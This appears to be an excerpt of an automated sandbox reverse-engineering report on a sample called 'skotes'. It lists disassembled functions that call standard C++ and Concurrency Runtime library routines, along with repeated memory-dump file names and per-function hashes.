Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 002AE7D7

Part of subcall function 002AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 002AE577
Part of subcall function 002AE544: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 002AE599

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 002AE854
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 002AE860
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 002AE86F
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 002AE879
Concurrency::location::_Assign.LIBCMT ref: 002AE8AD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 002AE8B5

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: f9b44ad7d0f927890edb3641fea0a97ec3d2bf0db8ab3379b5e9570987748615
Instruction ID: 1784d07cbffda1a250948a9084548e1f7cb38e86356b1b6bfde8f493008d26bc
Opcode Fuzzy Hash: f9b44ad7d0f927890edb3641fea0a97ec3d2bf0db8ab3379b5e9570987748615
Instruction Fuzzy Hash: 78414775A102059FCF00EF64C888AADB7B5FF49310F1584AADD499B392DB34A952CF91

Function 00296E00 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00296ED1
std::_Rethrow_future_exception.LIBCPMT ref: 00296F22
std::_Rethrow_future_exception.LIBCPMT ref: 00296F32
__Mtx_unlock.LIBCPMT ref: 00296FD5
__Mtx_unlock.LIBCPMT ref: 002970DB
__Mtx_unlock.LIBCPMT ref: 00297116

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
String ID:
API String ID: 1997747980-0
Opcode ID: 1a542677dfb5623fb9044bc829273be263b8a822aee6710af223d1acc699cfb1
Instruction ID: a1b7b137c435792e4b6e7de0fb49027e62723ec1d8c1f3ad974ea1fa010a5408
Opcode Fuzzy Hash: 1a542677dfb5623fb9044bc829273be263b8a822aee6710af223d1acc699cfb1
Instruction Fuzzy Hash: DEC1F370D243059FDF21DFA4D949BAEBBF8AF05310F10452EE81697681EB31A924CB61

Function 002A44DE Relevance: 9.2, APIs: 6, Instructions: 196timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 002A4538
ListArray.LIBCONCRT ref: 002A456C
Hash.LIBCMT ref: 002A45D5
Hash.LIBCMT ref: 002A45E5

Part of subcall function 002A9C41: std::bad_exception::bad_exception.LIBCMT ref: 002A9C63

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 002A474B
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 002A47A4

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: ArrayHashList$AsyncConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLibraryLoadRegisterTimerstd::bad_exception::bad_exception
String ID:
API String ID: 3010677857-0
Opcode ID: 8a4a83bfefd9ebe77f189bf5401fdd0c91947c06db8ce21668127086828d2b1a
Instruction ID: a11207e27e312faf7ac1064a8ecf021ffde67922d214fe3dec8395fc6e767f98
Opcode Fuzzy Hash: 8a4a83bfefd9ebe77f189bf5401fdd0c91947c06db8ce21668127086828d2b1a
Instruction Fuzzy Hash: F58174B0A21A52BBD748EF7488457D5FAA8BF4A704F10421BF42897281CBB4A574CBD1

Function 0029ECE6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0029ECED
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0029ED17

Part of subcall function 0029F3DD: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0029F3FA

__alloca_probe_16.LIBCMT ref: 0029ED53
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0029ED94
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0029EDC6
__freea.LIBCMT ref: 0029EDEC

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
String ID:
API String ID: 1319684358-0
Opcode ID: 91f5027812162c116cceb792d6ce2d0d696ae76208bab30f477b9e48a995664b
Instruction ID: a47ea9544c75c45546d83cfeceb2b8c19e299b040d0b71f1c776414e3a851b9a
Opcode Fuzzy Hash: 91f5027812162c116cceb792d6ce2d0d696ae76208bab30f477b9e48a995664b
Instruction Fuzzy Hash: D331AFB1E201068BDF15DFA8C9426ADB7F8EF09310F26406EE805E7351DB309E12CBA0

Function 002BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 002BCC66

Strings

v+, xrefs: 002BCBE1

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v+
API String ID: 3213747228-837333932
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 6e17eb706997620d35f2c3ba293bb39c89e84a28b68a6eeae4de6ac2fae4d127
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: 9CB137329242879FDB15CF28C881BEEBFE5EF55380F34816AE855EB241D6749D11CB60

Function 002B1B29 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 002B1B57
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002B1B66
std::invalid_argument::invalid_argument.LIBCONCRT ref: 002B1C2A

Strings

switchState, xrefs: 002B1B5E
pContext, xrefs: 002B1C22

Memory Dump Source

Source File: 00000006.00000002.3297457709.0000000000281000.00000040.00000001.01000000.00000008.sdmp, Offset: 00280000, based on PE: true

Associated: 00000006.00000002.3296564843.0000000000280000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3297457709.00000000002E2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299138671.00000000002E9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3299367462.00000000002EB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3300307618.00000000002F7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3301774924.000000000044F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302083816.0000000000452000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000468000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3302546330.0000000000473000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304173393.00000000004A4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3304808458.00000000004A5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305449229.00000000004AC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3305809725.00000000004B6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306517544.00000000004CD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3306849998.00000000004CE000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3307187321.00000000004CF000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3308051969.00000000004D7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3309195394.00000000004E0000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3310844862.00000000004E7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312051088.00000000004E8000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312449400.00000000004EA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3312808925.00000000004F3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313023487.00000000004F4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313292834.00000000004FC000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313557778.0000000000501000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313712501.0000000000509000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3313903846.000000000050A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314063316.000000000050B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.0000000000513000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314233348.000000000054E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3314922438.000000000057F000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3315383384.0000000000580000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316156788.0000000000589000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316341586.0000000000596000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.3316515374.0000000000597000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_280000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument$Concurrency::details::FreeIdleProcessorResetRoot::Virtual
String ID: pContext$switchState
API String ID: 2656283622-2660820399
Opcode ID: 7f6a12e9dd7e2c941a0d151c19a4d1113dbb38aaccf2956938cc427632cca575
Instruction ID: 4e8618e2393e60a7f1adfdf20086aa45b8d268e0f5810dbd69e6c5f37df6718d
Opcode Fuzzy Hash: 7f6a12e9dd7e2c941a0d151c19a4d1113dbb38aaccf2956938cc427632cca575
Instruction Fuzzy Hash: FD31D635A20205ABCF04EF64C8A5AEDB775FF54354F604566E81197392EB70ED31CA90

Function 002B4E1A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

FindSITargetTypeInstance.LIBVCRUNTIME ref: 002B4E6D
FindMITargetTypeInstance.LIBVCRUNTIME ref: 002B4E86
PMDtoOffset.LIBCMT ref: 002B4EAC

Strings

Bad dynamic_cast!, xrefs: 002B4EEE

Memory Dump Source

